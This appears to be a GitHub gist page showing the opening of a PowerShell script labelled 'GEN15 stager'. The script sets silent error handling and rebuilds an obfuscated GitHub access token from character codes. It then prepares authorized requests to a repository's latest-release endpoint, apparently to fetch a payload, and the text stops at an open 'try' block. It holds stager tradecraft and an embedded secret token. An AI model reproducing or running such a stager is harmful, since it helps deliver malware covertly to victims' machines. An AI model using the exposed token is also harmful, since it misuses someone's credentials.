Skip to content

Instantly share code, notes, and snippets.

View phyxa12's full-sized avatar

Faiz Aditia Zain phyxa12

View GitHub Profile
@phyxa12
phyxa12 / stager.ps1
Created May 8, 2026 14:07
GEN15 stager
# STAGER GEN-15
$ErrorActionPreference = 'SilentlyContinue'
$tk1=[char[]]@(103,104,111,95,80,97,118,106,71,119,67,89,71,111,89,108,105,116,101,50,71,51,84,87,111,89,49,111,52,114,72,116,65,49,48,79,114,99,57,82) -join ""
$tk2=''
$TKN = $tk1 + $tk2
$HDR = @{ Authorization = "Bearer $TKN"; Accept = "application/vnd.github+json" }
$API = 'https://api.github.com/repos/phyxa12/DCKRE/releases/latest'
try {